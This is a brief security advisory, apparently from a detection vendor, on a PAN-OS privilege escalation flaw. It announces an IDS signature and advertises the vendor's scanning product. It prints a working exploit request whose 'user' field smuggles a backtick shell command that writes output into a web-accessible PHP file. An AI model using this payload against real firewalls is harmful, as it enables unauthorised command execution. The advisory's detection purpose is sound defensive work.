Application Details
PAN-OS is the software that runs all Palo Alto Networks next-generation firewalls.
Vulnerability
A privilege escalation vulnerability in the Palo Alto Networks PAN-OS software.
Identification
This vulnerability could allow a PAN-OS administrator with access to the management web interface, to be able to perform "root privilege" tasks on the firewall.
POST /php/utils/createRemoteAppwebSession.php/watchTowr.js.map
user=`echo $(uname -a) > /var/appweb/htdocs/unauth/watchTowr.php`&userRole=superuser&remoteHost=&vsys=vsys1
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
Coverage
Idappcom have created signature 8025485 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments